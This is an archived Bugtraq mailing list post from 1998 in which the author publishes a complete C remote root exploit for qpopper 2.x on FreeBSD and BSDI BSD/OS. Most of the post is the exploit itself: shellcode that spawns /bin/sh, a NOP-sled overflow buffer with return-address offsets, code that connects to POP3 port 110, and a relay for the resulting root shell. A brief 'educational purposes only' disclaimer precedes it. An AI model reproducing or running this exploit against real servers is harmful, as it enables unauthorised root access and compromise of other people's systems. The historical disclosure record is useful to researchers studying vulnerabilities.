Bugtraq mailing list archives
QPOPPER - FreBSD, BSDI/OS remote exploit
From: mig () SILESIA PL (MiG)
Date: Tue, 30 Jun 1998 10:56:57 +0000
Hello Herbert Rosmanith's in his remote exploit post heven't mentioned that it works only against Linux qpopper... it is important becouse it will not work under BSD systems... (i realize that when i saw those \xcd\x80 what is int 0x80 and this is Linux system call). Becouse i haven't seen that somone use qpopper under Linux so i think it is quiet useless. Here is exploit i wrote which works against every FreeBSD & BSD/OS with standard qpopper 2.x instalation. It is for EDUCATIONAL purposes ONLY and use it at your OWN risk! Any comments welcome... ---x--------x----------x---------cut---------x-------x------x--------x--- /* * QPOPPER - remote root exploit * by Miroslaw Grzybek <mig () zeus polsl gliwice pl> * * - tested against: FreeBSD 3.0 * FreeBSD 2.2.x * BSDI BSD/OS 2.1 * - offsets: FreeBSD with qpopper 2.3 - 2.4 0 * FreeBSD with qpopper 2.1.4-R3 900 * BSD/OS with qpopper 2.1.4-R3 1500 * * this is for EDUCATIONAL purposes ONLY */ #include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/errno.h> char *shell="\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17" "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e" "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89" "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff" "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb" "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define ADDR 0xefbfd504 #define OFFSET 0 #define BUFLEN 1200 char buf[BUFLEN]; int offset=OFFSET; int sock; struct sockaddr_in sa; struct hostent *hp; void main (int argc, char *argv[]) { int i; if(argc<2) { printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]); exit(0); } if(argc>2) offset=atoi(argv[2]); /* Prepare buffer */ memset(buf,0x90,BUFLEN); memcpy(buf+800,shell,strlen(shell)); for(i=901;i<BUFLEN-4;i+=4) *(int *)&buf[i]=ADDR+offset; buf[BUFLEN]='\n'; /* Resolve remote hostname & connect*/ if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) { perror("gethostbyname()"); exit(0); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } sa.sin_family=AF_INET; sa.sin_port=htons(110); memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()"); exit(0); } printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout); /* Write evil data */ write(sock,buf,strlen(buf)); /* Enjoy root shell ;) */ while(1) { fd_set input; FD_SET(0,&input); FD_SET(sock,&input); if((select(sock+1,&input,NULL,NULL,NULL))<0) { if(errno==EINTR) continue; printf("CONNECTION CLOSED...\n"); fflush(stdout); exit(1); } if(FD_ISSET(sock,&input)) write(1,buf,read(sock,buf,BUFLEN)); if(FD_ISSET(0,&input)) write(sock,buf,read(0,buf,BUFLEN)); } } ---x--------x----------x---------cut---------x-------x------x--------x--- ----------------------------- *-+---+------+---------+------+---+-* ----- Miroslaw Grzybek ----- | PGP KEY AVAILABLE FROM | --mig () zeus polsl gliwice pl-- | http://www.polsl.gliwice.pl/~mig | ----------------------------- *-+---+------+---------+------+---+-*
Current thread:
- Re: Vulnerability in 4.4BSD Secure Levels Implementation, (continued)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation tqbf () pobox com (Jun 11)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation Niall Smart (Jun 13)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation Tim Newsham (Jun 26)
- check-ps 1.2 alpha 4 released Duncan Simpson (Jun 26)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation tqbf () pobox com (Jun 14)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation Niall Smart (Jun 28)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation Tim Newsham (Jun 28)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation Roger Harrison ? (Jun 29)
- Serious Linux 2.0.34 security problem David Luyer (Jun 30)
- Re: Serious Linux 2.0.34 security problem Jim Bourne (Jun 30)
- QPOPPER - FreBSD, BSDI/OS remote exploit MiG (Jun 30)